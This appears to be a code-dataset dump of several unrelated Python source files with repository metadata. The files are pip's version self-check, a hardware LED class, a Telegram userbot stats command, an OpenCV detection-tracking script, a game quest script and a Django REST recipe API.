self.state = {} # type: Dict[str, Any]
self.statefile_path = None
# Try to load the existing state
if cache_dir:
self.statefile_path = os.path.join(
cache_dir, "selfcheck", _get_statefile_name(self.key)
)
try:
with open(self.statefile_path, encoding="utf-8") as statefile:
self.state = json.load(statefile)
except (OSError, ValueError, KeyError):
# Explicitly suppressing exceptions, since we don't want to
# error out if the cache file is invalid.
pass
@property
def key(self):
# type: () -> str
return sys.prefix
def save(self, pypi_version, current_time):
# type: (str, datetime.datetime) -> None
# If we do not have a path to cache in, don't bother saving.
if not self.statefile_path:
return
# Check to make sure that we own the directory
if not check_path_owner(os.path.dirname(self.statefile_path)):
return
# Now that we've ensured the directory is owned by this user, we'll go
# ahead and make sure that all our directories are created.
ensure_dir(os.path.dirname(self.statefile_path))
state = {
# Include the key so it's easy to tell which pip wrote the
# file.
"key": self.key,
"last_check": current_time.strftime(SELFCHECK_DATE_FMT),
"pypi_version": pypi_version,
}
text = json.dumps(state, sort_keys=True, separators=(",", ":"))
with adjacent_tmp_file(self.statefile_path) as f:
f.write(text.encode())
try:
# Since we have a prefix-specific state file, we can just
# overwrite whatever is there, no need to check.
replace(f.name, self.statefile_path)
except OSError:
# Best effort.
pass
def was_installed_by_pip(pkg):
# type: (str) -> bool
"""Checks whether pkg was installed by pip
This is used not to display the upgrade message when pip is in fact
installed by system package manager, such as dnf on Fedora.
"""
dist = get_default_environment().get_distribution(pkg)
return dist is not None and "pip" == dist.installer
def pip_self_version_check(session, options):
# type: (PipSession, optparse.Values) -> None
"""Check for an update for pip.
Limit the frequency of checks to once per week. State is stored either in
the active virtualenv or in the user's USER_CACHE_DIR keyed off the prefix
of the pip script path.
"""
installed_dist = get_default_environment().get_distribution("pip")
if not installed_dist:
return
pip_version = installed_dist.version
pypi_version = None
try:
state = SelfCheckState(cache_dir=options.cache_dir)
current_time = datetime.datetime.utcnow()
# Determine if we need to refresh the state
if "last_check" in state.state and "pypi_version" in state.state:
last_check = datetime.datetime.strptime(
state.state["last_check"],
SELFCHECK_DATE_FMT
)
if (current_time - last_check).total_seconds() < 7 * 24 * 60 * 60:
pypi_version = state.state["pypi_version"]
# Refresh the version if we need to or just see if we need to warn
if pypi_version is None:
# Lets use PackageFinder to see what the latest pip version is
link_collector = LinkCollector.create(
session,
options=options,
suppress_no_index=True,
)
# Pass allow_yanked=False so we don't suggest upgrading to a
# yanked version.
selection_prefs = SelectionPreferences(
allow_yanked=False,
allow_all_prereleases=False, # Explicitly set to False
)
finder = PackageFinder.create(
link_collector=link_collector,
selection_prefs=selection_prefs,
)
best_candidate = finder.find_best_candidate("pip").best_candidate
if best_candidate is None:
return
pypi_version = str(best_candidate.version)
# save that we've performed a check
state.save(pypi_version, current_time)
remote_version = parse_version(pypi_version)
local_version_is_older = (
pip_version < remote_version and
pip_version.base_version != remote_version.base_version and
was_installed_by_pip('pip')
)
# Determine if our pypi_version is older
if not local_version_is_older:
return
# We cannot tell how the current pip is available in the current
# command context, so be pragmatic here and suggest the command
# that's always available. This does not accommodate spaces in
# `sys.executable`.
pip_cmd = f"{sys.executable} -m pip"
logger.warning(
"You are using pip version %s; however, version %s is "
"available.\nYou should consider upgrading via the "
"'%s install --upgrade pip' command.",
pip_version, pypi_version, pip_cmd
)
except Exception:
logger.debug(
"There was an error checking the latest version of pip",
exc_info=True,
)
| 33.937824
| 87
| 0.630382
|
import datetime
import hashlib
import json
import logging
import os.path
import sys
from typing import TYPE_CHECKING
from pip._vendor.packaging.version import parse as parse_version
from pip._internal.index.collector import LinkCollector
from pip._internal.index.package_finder import PackageFinder
from pip._internal.metadata import get_default_environment
from pip._internal.models.selection_prefs import SelectionPreferences
from pip._internal.utils.filesystem import adjacent_tmp_file, check_path_owner, replace
from pip._internal.utils.misc import ensure_dir
if TYPE_CHECKING:
import optparse
from typing import Any, Dict
from pip._internal.network.session import PipSession
SELFCHECK_DATE_FMT = "%Y-%m-%dT%H:%M:%SZ"
logger = logging.getLogger(__name__)
def _get_statefile_name(key):
key_bytes = key.encode()
name = hashlib.sha224(key_bytes).hexdigest()
return name
class SelfCheckState:
def __init__(self, cache_dir):
self.state = {}
self.statefile_path = None
if cache_dir:
self.statefile_path = os.path.join(
cache_dir, "selfcheck", _get_statefile_name(self.key)
)
try:
with open(self.statefile_path, encoding="utf-8") as statefile:
self.state = json.load(statefile)
except (OSError, ValueError, KeyError):
# error out if the cache file is invalid.
pass
@property
def key(self):
# type: () -> str
return sys.prefix
def save(self, pypi_version, current_time):
# type: (str, datetime.datetime) -> None
# If we do not have a path to cache in, don't bother saving.
if not self.statefile_path:
return
if not check_path_owner(os.path.dirname(self.statefile_path)):
return
ensure_dir(os.path.dirname(self.statefile_path))
state = {
# file.
"key": self.key,
"last_check": current_time.strftime(SELFCHECK_DATE_FMT),
"pypi_version": pypi_version,
}
text = json.dumps(state, sort_keys=True, separators=(",", ":"))
with adjacent_tmp_file(self.statefile_path) as f:
f.write(text.encode())
try:
# Since we have a prefix-specific state file, we can just
# overwrite whatever is there, no need to check.
replace(f.name, self.statefile_path)
except OSError:
# Best effort.
pass
def was_installed_by_pip(pkg):
# type: (str) -> bool
dist = get_default_environment().get_distribution(pkg)
return dist is not None and "pip" == dist.installer
def pip_self_version_check(session, options):
# type: (PipSession, optparse.Values) -> None
installed_dist = get_default_environment().get_distribution("pip")
if not installed_dist:
return
pip_version = installed_dist.version
pypi_version = None
try:
state = SelfCheckState(cache_dir=options.cache_dir)
current_time = datetime.datetime.utcnow()
# Determine if we need to refresh the state
if "last_check" in state.state and "pypi_version" in state.state:
last_check = datetime.datetime.strptime(
state.state["last_check"],
SELFCHECK_DATE_FMT
)
if (current_time - last_check).total_seconds() < 7 * 24 * 60 * 60:
pypi_version = state.state["pypi_version"]
# Refresh the version if we need to or just see if we need to warn
if pypi_version is None:
# Lets use PackageFinder to see what the latest pip version is
link_collector = LinkCollector.create(
session,
options=options,
suppress_no_index=True,
)
# Pass allow_yanked=False so we don't suggest upgrading to a
selection_prefs = SelectionPreferences(
allow_yanked=False,
allow_all_prereleases=False,
)
finder = PackageFinder.create(
link_collector=link_collector,
selection_prefs=selection_prefs,
)
best_candidate = finder.find_best_candidate("pip").best_candidate
if best_candidate is None:
return
pypi_version = str(best_candidate.version)
state.save(pypi_version, current_time)
remote_version = parse_version(pypi_version)
local_version_is_older = (
pip_version < remote_version and
pip_version.base_version != remote_version.base_version and
was_installed_by_pip('pip')
)
# Determine if our pypi_version is older
if not local_version_is_older:
return
# We cannot tell how the current pip is available in the current
# command context, so be pragmatic here and suggest the command
# that's always available. This does not accommodate spaces in
pip_cmd = f"{sys.executable} -m pip"
logger.warning(
"You are using pip version %s; however, version %s is "
"available.\nYou should consider upgrading via the "
"'%s install --upgrade pip' command.",
pip_version, pypi_version, pip_cmd
)
except Exception:
logger.debug(
"There was an error checking the latest version of pip",
exc_info=True,
)
| true
| true
|
f705dc263f4b173513dc6e8e38729cebb3b5b1ae
| 259
|
py
|
Python
|
Python/treehopper/libraries/displays/led_shift_register.py
|
ehailey1/treehopper-sdk
|
c242f939a93d93da11ff79577666130c15aecec7
|
[
"MIT"
] | 3
|
2018-03-16T07:00:42.000Z
|
2022-03-27T00:39:55.000Z
|
Python/treehopper/libraries/displays/led_shift_register.py
|
ehailey1/treehopper-sdk
|
c242f939a93d93da11ff79577666130c15aecec7
|
[
"MIT"
] | 16
|
2016-08-12T18:51:04.000Z
|
2021-04-16T16:14:07.000Z
|
Python/treehopper/libraries/displays/led_shift_register.py
|
ehailey1/treehopper-sdk
|
c242f939a93d93da11ff79577666130c15aecec7
|
[
"MIT"
] | 6
|
2015-11-04T15:53:49.000Z
|
2020-06-25T18:34:47.000Z
|
from treehopper.libraries.displays import LedDriver
from treehopper.libraries.io.expander.shift_register import ChainableShiftRegisterOutput
class LedShiftRegister(ChainableShiftRegisterOutput, LedDriver):
def __init__(self):
super().__init__()
| 32.375
| 88
| 0.822394
|
from treehopper.libraries.displays import LedDriver
from treehopper.libraries.io.expander.shift_register import ChainableShiftRegisterOutput
class LedShiftRegister(ChainableShiftRegisterOutput, LedDriver):
def __init__(self):
super().__init__()
| true
| true
|
f705dc6351fae60f5584a9468074494232907552
| 1,250
|
py
|
Python
|
userbot/plugins/stats.py
|
NIKHIL5757H/SimbhaUserbot
|
86bd946a47bd0d74f5ef3c46ef00f9bdb9bf11e0
|
[
"MIT"
] | 2
|
2020-07-25T17:58:55.000Z
|
2020-11-26T10:54:46.000Z
|
userbot/plugins/stats.py
|
NIKHIL5757H/SimbhaUserbot
|
86bd946a47bd0d74f5ef3c46ef00f9bdb9bf11e0
|
[
"MIT"
] | null | null | null |
userbot/plugins/stats.py
|
NIKHIL5757H/SimbhaUserbot
|
86bd946a47bd0d74f5ef3c46ef00f9bdb9bf11e0
|
[
"MIT"
] | 2
|
2020-08-03T09:09:06.000Z
|
2020-08-12T05:05:24.000Z
|
from userbot import bot
from telethon import events
import asyncio
from datetime import datetime
from telethon.tl.types import User, Chat, Channel
from uniborg.util import admin_cmd
@bot.on(admin_cmd(pattern=r"stats"))
async def _(event):
if event.fwd_from:
return
start = datetime.now()
u = 0
g = 0
c = 0
bc = 0
b = 0
dialogs = await bot.get_dialogs(
limit=None,
ignore_migrated=True
)
for d in dialogs:
currrent_entity = d.entity
if type(currrent_entity) is User:
if currrent_entity.bot:
b += 1
else:
u += 1
elif type(currrent_entity) is Chat:
g += 1
elif type(currrent_entity) is Channel:
if currrent_entity.broadcast:
bc += 1
else:
c += 1
else:
print(d)
end = datetime.now()
ms = (end - start).seconds
await event.edit("""
=================================
`Your Stats Obtained in {} seconds`
`You have {} Private Messages`
`You are in {} Groups`
`You are in {} Super Groups`
`You Are in {} Channels`
`And finally Bots = {}`
===================================""".format(ms, u, g, c, bc, b))
| 25.510204
| 66
| 0.5312
|
from userbot import bot
from telethon import events
import asyncio
from datetime import datetime
from telethon.tl.types import User, Chat, Channel
from uniborg.util import admin_cmd
@bot.on(admin_cmd(pattern=r"stats"))
async def _(event):
if event.fwd_from:
return
start = datetime.now()
u = 0
g = 0
c = 0
bc = 0
b = 0
dialogs = await bot.get_dialogs(
limit=None,
ignore_migrated=True
)
for d in dialogs:
currrent_entity = d.entity
if type(currrent_entity) is User:
if currrent_entity.bot:
b += 1
else:
u += 1
elif type(currrent_entity) is Chat:
g += 1
elif type(currrent_entity) is Channel:
if currrent_entity.broadcast:
bc += 1
else:
c += 1
else:
print(d)
end = datetime.now()
ms = (end - start).seconds
await event.edit("""
=================================
`Your Stats Obtained in {} seconds`
`You have {} Private Messages`
`You are in {} Groups`
`You are in {} Super Groups`
`You Are in {} Channels`
`And finally Bots = {}`
===================================""".format(ms, u, g, c, bc, b))
| true
| true
|
f705dd4832b18fd425450cd30cdfb3cf0a126a5e
| 5,623
|
py
|
Python
|
tracking.py
|
hnkulkarni/cs231aApproachingOdt
|
07c68d787442243d653ae72a7e9473b4c3c5c6b4
|
[
"MIT"
] | null | null | null |
tracking.py
|
hnkulkarni/cs231aApproachingOdt
|
07c68d787442243d653ae72a7e9473b4c3c5c6b4
|
[
"MIT"
] | null | null | null |
tracking.py
|
hnkulkarni/cs231aApproachingOdt
|
07c68d787442243d653ae72a7e9473b4c3c5c6b4
|
[
"MIT"
] | null | null | null |
# This file will track detections
import tqdm
import cv2
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from matplotlib.ticker import NullLocator
from cs231aApproachingOdt import utils as myutils
from PIL import Image
import os
import torch
import torchvision.ops.boxes as bops
def match_detections(prev_path, prev_detection, new_path, new_detection, size=(640, 480)):
prev_range = [*range(len(prev_detection))]
new_range = [*range(len(new_detection))]
permutations = myutils.unique_permutations(prev_range, new_range)
fig, ax = plt.subplots(1, 2)
prev_img = myutils.load_resize(prev_path, size)
new_img = myutils.load_resize(new_path, size)
matching_pairs = []
for old, new in permutations:
[a.cla() for a in ax]
draw_detection(prev_img, prev_detection[old], ax[0])
ax[0].set_title(f"{os.path.basename(prev_path)}")
draw_detection(new_img, new_detection[new], ax[1])
ax[1].set_title(f"{os.path.basename(new_path)}")
#plt.pause(0.1)
iou = get_iou(prev_detection[old], new_detection[new])
if iou < 0.7:
continue
prev_crop = crop_detection(prev_img, prev_detection[old])
new_crop = crop_detection(new_img, new_detection[new])
#keypoint_matching(prev_crop, new_crop)
methods = ['cv2.TM_CCOEFF', 'cv2.TM_CCOEFF_NORMED', 'cv2.TM_CCORR',
'cv2.TM_CCORR_NORMED', 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED']
is_match = template_matching(new_crop, prev_crop, methods[3])
if is_match == True:
matching_pairs.append((old, new))
plt.close(fig)
return matching_pairs
def get_iou(prev_detection, new_detection):
box1 = new_detection[:4].reshape((1, 4))
box2 = prev_detection[:4].reshape((1, 4))
iou = bops.box_iou(box1, box2)
return iou
def template_matching(img1, template, method):
fig_template, ax = plt.subplots()
template_gray = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY)
img1_gray = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
img = img1_gray.copy()
w_t, h_t = template_gray.shape[::-1]
w_i, h_i = img1_gray.shape[::-1]
if (w_t > w_i) or (h_t > h_i):
return False
method = eval(method)
# Apply template Matching
res = cv2.matchTemplate(img1_gray, template_gray, method)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
#print(f"\n{min_val}, {max_val}, {min_loc}, {max_loc}")
# If the method is TM_SQDIFF or TM_SQDIFF_NORMED, take minimum
if method in [cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED]:
top_left = min_loc
else:
top_left = max_loc
# bottom_right = (top_left[0] + w, top_left[1] + h)
# cv2.rectangle(img, top_left, bottom_right, 255, 2)
# plt.subplot(121), plt.imshow(res, cmap='gray')
# plt.title('Matching Result'), plt.xticks([]), plt.yticks([])
# plt.subplot(122), plt.imshow(img, cmap='gray')
# plt.title('Detected Point'), plt.xticks([]), plt.yticks([])
# plt.suptitle(method)
# plt.show()
# plt.close(fig_template)
if max_val > 0.9:
return True
else:
return False
def keypoint_matching(img1, img2):
# Source: https://docs.opencv.org/master/dc/dc3/tutorial_py_matcher.html
img1_gray = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
img2_gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)
myutils.show(img1_gray)
orb = cv2.ORB_create()
# find the keypoints and descriptors with ORB
kp1, des1 = orb.detectAndCompute(img1_gray, None)
kp2, des2 = orb.detectAndCompute(img2_gray, None)
# create BFMatcher object
bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)
# Match descriptors.
matches = bf.match(des1, des2)
# Sort them in the order of their distance.
matches = sorted(matches, key=lambda x: x.distance)
# Draw first 10 matches.
img3 = cv2.drawMatches(img1, kp1, img2, kp2, matches[:10], None, flags=cv2.DrawMatchesFlags_NOT_DRAW_SINGLE_POINTS)
fig_match, ax_match = plt.subplot()
plt.imshow(img3)
plt.show()
plt.close(fig_match)
def crop_detection(img, detection):
x1, y1, x2, y2, conf, cls_conf, cls_pred = detection
crop = img[int(y1):int(y2), int(x1):int(x2)]
return crop
def draw_detection(img, detection, ax):
ax.imshow(myutils.bgr2rgb(img))
x1, y1, x2, y2, conf, cls_conf, cls_pred = detection
box_w = x2 - x1
box_h = y2 - y1
# Create a Rectangle patch
bbox = patches.Rectangle((x1, y1), box_w, box_h, linewidth=2, edgecolor="red", facecolor="none")
# Add the bbox to the plot
ax.add_patch(bbox)
ax.set_xticks([])
ax.set_yticks([])
def tracking_by_detection(img_folder, image_paths, img_detections, size=(640, 480)):
# Iterate through images and save plot of detections
print("In Tracking By Detection")
path_detections_zip = zip(image_paths, img_detections)
num_images = len(image_paths)
tqdm_pbar = tqdm.tqdm(path_detections_zip, total=num_images)
tracks_dict = dict()
for img_i, (path, detections) in enumerate(tqdm_pbar):
tqdm_pbar.set_postfix({"Processing ": path})
if img_i == 0:
print("Initialize Detections")
continue
matching_pairs = match_detections(prev_path=image_paths[img_i - 1], prev_detection=img_detections[img_i - 1],
new_path=path, new_detection=detections, size=size)
print(matching_pairs)
tracks_dict[path] = matching_pairs
myutils.pickle_save(os.path.join(img_folder, "output/tracks.pickle"), (tracks_dict, img_detections))
return tracks_dict
| 35.588608
| 119
| 0.676685
|
import tqdm
import cv2
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from matplotlib.ticker import NullLocator
from cs231aApproachingOdt import utils as myutils
from PIL import Image
import os
import torch
import torchvision.ops.boxes as bops
def match_detections(prev_path, prev_detection, new_path, new_detection, size=(640, 480)):
prev_range = [*range(len(prev_detection))]
new_range = [*range(len(new_detection))]
permutations = myutils.unique_permutations(prev_range, new_range)
fig, ax = plt.subplots(1, 2)
prev_img = myutils.load_resize(prev_path, size)
new_img = myutils.load_resize(new_path, size)
matching_pairs = []
for old, new in permutations:
[a.cla() for a in ax]
draw_detection(prev_img, prev_detection[old], ax[0])
ax[0].set_title(f"{os.path.basename(prev_path)}")
draw_detection(new_img, new_detection[new], ax[1])
ax[1].set_title(f"{os.path.basename(new_path)}")
iou = get_iou(prev_detection[old], new_detection[new])
if iou < 0.7:
continue
prev_crop = crop_detection(prev_img, prev_detection[old])
new_crop = crop_detection(new_img, new_detection[new])
methods = ['cv2.TM_CCOEFF', 'cv2.TM_CCOEFF_NORMED', 'cv2.TM_CCORR',
'cv2.TM_CCORR_NORMED', 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED']
is_match = template_matching(new_crop, prev_crop, methods[3])
if is_match == True:
matching_pairs.append((old, new))
plt.close(fig)
return matching_pairs
def get_iou(prev_detection, new_detection):
box1 = new_detection[:4].reshape((1, 4))
box2 = prev_detection[:4].reshape((1, 4))
iou = bops.box_iou(box1, box2)
return iou
def template_matching(img1, template, method):
fig_template, ax = plt.subplots()
template_gray = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY)
img1_gray = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
img = img1_gray.copy()
w_t, h_t = template_gray.shape[::-1]
w_i, h_i = img1_gray.shape[::-1]
if (w_t > w_i) or (h_t > h_i):
return False
method = eval(method)
res = cv2.matchTemplate(img1_gray, template_gray, method)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
if method in [cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED]:
top_left = min_loc
else:
top_left = max_loc
if max_val > 0.9:
return True
else:
return False
def keypoint_matching(img1, img2):
img1_gray = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
img2_gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)
myutils.show(img1_gray)
orb = cv2.ORB_create()
kp1, des1 = orb.detectAndCompute(img1_gray, None)
kp2, des2 = orb.detectAndCompute(img2_gray, None)
bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)
matches = bf.match(des1, des2)
matches = sorted(matches, key=lambda x: x.distance)
img3 = cv2.drawMatches(img1, kp1, img2, kp2, matches[:10], None, flags=cv2.DrawMatchesFlags_NOT_DRAW_SINGLE_POINTS)
fig_match, ax_match = plt.subplot()
plt.imshow(img3)
plt.show()
plt.close(fig_match)
def crop_detection(img, detection):
x1, y1, x2, y2, conf, cls_conf, cls_pred = detection
crop = img[int(y1):int(y2), int(x1):int(x2)]
return crop
def draw_detection(img, detection, ax):
ax.imshow(myutils.bgr2rgb(img))
x1, y1, x2, y2, conf, cls_conf, cls_pred = detection
box_w = x2 - x1
box_h = y2 - y1
bbox = patches.Rectangle((x1, y1), box_w, box_h, linewidth=2, edgecolor="red", facecolor="none")
ax.add_patch(bbox)
ax.set_xticks([])
ax.set_yticks([])
def tracking_by_detection(img_folder, image_paths, img_detections, size=(640, 480)):
print("In Tracking By Detection")
path_detections_zip = zip(image_paths, img_detections)
num_images = len(image_paths)
tqdm_pbar = tqdm.tqdm(path_detections_zip, total=num_images)
tracks_dict = dict()
for img_i, (path, detections) in enumerate(tqdm_pbar):
tqdm_pbar.set_postfix({"Processing ": path})
if img_i == 0:
print("Initialize Detections")
continue
matching_pairs = match_detections(prev_path=image_paths[img_i - 1], prev_detection=img_detections[img_i - 1],
new_path=path, new_detection=detections, size=size)
print(matching_pairs)
tracks_dict[path] = matching_pairs
myutils.pickle_save(os.path.join(img_folder, "output/tracks.pickle"), (tracks_dict, img_detections))
return tracks_dict
| true
| true
|
f705de5dde82e6bd54b2dfd92a538123dac03a9b
| 105
|
py
|
Python
|
scripts/quest/q5521e.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 54
|
2019-04-16T23:24:48.000Z
|
2021-12-18T11:41:50.000Z
|
scripts/quest/q5521e.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 3
|
2019-05-19T15:19:41.000Z
|
2020-04-27T16:29:16.000Z
|
scripts/quest/q5521e.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 49
|
2020-11-25T23:29:16.000Z
|
2022-03-26T16:20:24.000Z
|
# Tot's reward lv 40
sm.completeQuest(5521)
# Lv. 40 Equipment box
sm.giveItem(2431877, 1)
sm.dispose()
| 15
| 23
| 0.72381
|
sm.completeQuest(5521)
# Lv. 40 Equipment box
sm.giveItem(2431877, 1)
sm.dispose()
| true
| true
|
f705de767d15e8ccdef551f1fa42f380207c8feb
| 11,462
|
py
|
Python
|
backend/api/views.py
|
vadikam100500/foodgram-project-react
|
11119e11d4919f72b3f104209102048ee38c366a
|
[
"PostgreSQL",
"MIT"
] | 1
|
2021-12-14T14:43:51.000Z
|
2021-12-14T14:43:51.000Z
|
backend/api/views.py
|
vadikam100500/foodgram-project-react
|
11119e11d4919f72b3f104209102048ee38c366a
|
[
"PostgreSQL",
"MIT"
] | null | null | null |
backend/api/views.py
|
vadikam100500/foodgram-project-react
|
11119e11d4919f72b3f104209102048ee38c366a
|
[
"PostgreSQL",
"MIT"
] | null | null | null |
import csv
from django.contrib.auth import get_user_model
from django.db.models.aggregates import Sum
from django.http.response import HttpResponse
from django.utils.decorators import method_decorator
from djoser.serializers import SetPasswordSerializer
from djoser.views import TokenCreateView
from drf_yasg.utils import swagger_auto_schema
from rest_framework import filters, status
from rest_framework.decorators import action
from rest_framework.generics import get_object_or_404
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.viewsets import ModelViewSet
from api import serializers
from api.decorators import multi_method_decorator
from api.docs.schemas import (EmptyAutoSchema, follower_params,
recipe_request_body)
from api.filters import GlobalFilterBackend
from api.pagination import FollowPagination, LimitPagination
from api.permissions import (IsAdminOrReadIfAuthenticatedObjPerm,
IsAdminOrReadOnly, RecipePermission)
from food.models import Ingredient, IngredientInRecipe, Recipe, Tag
from interactions.models import Favorite, Follow, Purchase
User = get_user_model()
class CustomTokenCreateView(TokenCreateView):
def _action(self, serializer):
response = super()._action(serializer)
response.status_code = status.HTTP_201_CREATED
return response
@multi_method_decorator(
names=['update', 'partial_update', 'destroy'],
decorator=swagger_auto_schema(auto_schema=None)
)
class CustomUserViewSet(ModelViewSet):
queryset = User.objects.all().order_by('id')
serializer_class = serializers.CustomUserSerializer
pagination_class = LimitPagination
permission_classes = (IsAdminOrReadIfAuthenticatedObjPerm,)
def get_serializer_class(self):
if self.action in ('list', 'retrieve', 'me'):
return serializers.CustomUserGetSerializer
elif self.action == 'set_password':
return SetPasswordSerializer
elif self.action == 'subscriptions':
return serializers.SubscriptionsSerializer
elif self.action == 'subscribe':
return serializers.FollowSerializer
return self.serializer_class
@action(['get'], detail=False,
permission_classes=(IsAuthenticated,))
@swagger_auto_schema(auto_schema=EmptyAutoSchema)
def me(self, request, pk=None):
serializer = self.get_serializer(self.request.user)
return Response(serializer.data, status=status.HTTP_200_OK)
@action(['post'], detail=False, permission_classes=(IsAuthenticated,))
@swagger_auto_schema(request_body=SetPasswordSerializer,
responses={204: 'No Content'})
def set_password(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.request.user.set_password(
serializer.validated_data['new_password']
)
self.request.user.save()
return Response(status=status.HTTP_204_NO_CONTENT)
@action(['get'], detail=False, pagination_class=FollowPagination,
permission_classes=[IsAuthenticated])
@swagger_auto_schema(responses={201: serializers.SubscriptionsSerializer})
def subscriptions(self, request):
queryset = Follow.objects.filter(user=request.user)
if not queryset.exists():
return Response({'error': 'Вы еще ни на кого не подписаны'},
status=status.HTTP_400_BAD_REQUEST)
page = self.paginate_queryset(queryset)
if page:
serializer = self.get_serializer(
page,
many=True,
context={'request': request}
)
return self.get_paginated_response(serializer.data)
serializer = self.get_serializer(queryset, many=True,
context={'request': request})
return Response(serializer.data)
@action(['get'], detail=True, permission_classes=[IsAuthenticated])
@swagger_auto_schema(manual_parameters=follower_params,
responses={201: serializers.SubscriptionsSerializer})
def subscribe(self, request, pk=None):
user, author = self.following_validate(request, pk)
if not author:
return Response({'error': user},
status=status.HTTP_400_BAD_REQUEST)
data = {'user': user.id, 'author': author.id}
serializer = self.get_serializer(
data=data, context={'request': request}
)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
@subscribe.mapping.delete
def delete_subscribe(self, request, pk=None):
user, author, subscribe = self.following_validate(request, pk,
delete=True)
if not author or not subscribe:
return Response({'error': user},
status=status.HTTP_400_BAD_REQUEST)
subscribe.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
def following_validate(self, request, pk, delete=False):
user = request.user
if not User.objects.filter(id=pk).exists():
if delete:
return 'Такого пользователя еще нет', False, False
return 'Такого пользователя еще нет', False
author = get_object_or_404(User, id=pk)
if delete:
if not Follow.objects.filter(user=user, author=author).exists():
return ('У вас еще нет этого пользователя в подписках',
True, False)
else:
return (user, author,
get_object_or_404(Follow, user=user,
author=author))
return user, author
@multi_method_decorator(
names=['create', 'update', 'partial_update', 'destroy'],
decorator=swagger_auto_schema(auto_schema=None)
)
class TagViewSet(ModelViewSet):
queryset = Tag.objects.all()
serializer_class = serializers.TagSerializer
permission_classes = (IsAdminOrReadOnly,)
@multi_method_decorator(
names=['create', 'update', 'partial_update', 'destroy'],
decorator=swagger_auto_schema(auto_schema=None)
)
class IngredientsViewSet(ModelViewSet):
queryset = Ingredient.objects.all()
serializer_class = serializers.IngredientSerializer
permission_classes = (IsAdminOrReadOnly,)
filter_backends = (filters.SearchFilter,)
search_fields = ('name', )
@method_decorator(
swagger_auto_schema(
request_body=recipe_request_body,
responses={201: serializers.RecipeSerializer}
),
name='create'
)
@method_decorator(
swagger_auto_schema(
request_body=recipe_request_body,
responses={200: serializers.RecipeSerializer}
),
name='update'
)
@method_decorator(
swagger_auto_schema(auto_schema=None),
name='partial_update'
)
class RecipeViewSet(ModelViewSet):
queryset = Recipe.objects.all()
serializer_class = serializers.RecipeSerializer
pagination_class = LimitPagination
permission_classes = (RecipePermission,)
filter_backends = (GlobalFilterBackend,)
filterset_fields = ('author', )
def get_serializer_class(self):
if self.action == 'favorite':
return serializers.FavoriteSerializer
elif self.action == 'shopping_cart':
return serializers.PurchaseSerializer
return self.serializer_class
@action(['get'], detail=True, permission_classes=[IsAuthenticated])
@swagger_auto_schema(responses={201: serializers.RecipeLiteSerializer})
def favorite(self, request, pk=None):
return self.alt_endpoint_create(request, pk)
@favorite.mapping.delete
def delete_favorite(self, request, pk=None):
return self.alt_endpoint_delete(request, pk, favorite=True)
@action(['get'], detail=True, permission_classes=[IsAuthenticated])
@swagger_auto_schema(responses={201: serializers.RecipeLiteSerializer})
def shopping_cart(self, request, pk=None):
return self.alt_endpoint_create(request, pk)
@shopping_cart.mapping.delete
def delete_shopping_cart(self, request, pk=None):
return self.alt_endpoint_delete(request, pk, cart=True)
@action(['get'], detail=False, permission_classes=(IsAuthenticated,))
@swagger_auto_schema(auto_schema=EmptyAutoSchema,
responses={200: 'Download', 401: 'NotAuthorized'})
def download_shopping_cart(self, request):
ingredients = (
IngredientInRecipe.objects
.select_related('ingredient', 'recipe')
.prefetch_related('purchases')
.filter(recipe__purchases__user=request.user)
.values_list('ingredient__name', 'ingredient__measurement_unit')
.annotate(amount=Sum('amount'))
)
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = ('attachment;'
'filename="Your_shopping_list.csv"')
writer = csv.writer(response)
writer.writerow(['Ингредиент', 'Единица измерения', 'Количество'])
for ingredient in ingredients:
writer.writerow(ingredient)
return response
def alt_endpoint_create(self, request, pk):
verdict, recipe, user = self.recipe_validate(request, pk)
if not verdict:
return recipe
data = {
'user': user.id,
'recipe': recipe.id,
}
serializer = self.get_serializer(data=data,
context={'request': request})
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
def alt_endpoint_delete(self, request, pk, favorite=False, cart=False):
verdict, obj = self.recipe_validate(request, pk, delete=True,
favorite=favorite, cart=cart)
if not verdict:
return obj
obj.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
def recipe_validate(self, request, pk, delete=False,
favorite=False, cart=False):
user = request.user
if not Recipe.objects.filter(id=pk).exists():
return False, Response({'error': 'Такого рецепта еще нет'},
status=status.HTTP_400_BAD_REQUEST), None
recipe = get_object_or_404(Recipe, id=pk)
if delete:
model_answer = {
'favorite': (Favorite, 'избранном'),
'cart': (Purchase, 'списке покупок')
}
if favorite:
model, answer = model_answer.get('favorite')
if cart:
model, answer = model_answer.get('cart')
if not model.objects.filter(user=user, recipe=recipe).exists():
return False, Response(
{'error': f'Такого рецепта еще нет в вашем {answer}'},
status=status.HTTP_400_BAD_REQUEST
)
return True, get_object_or_404(model, user=user, recipe=recipe)
return True, recipe, user
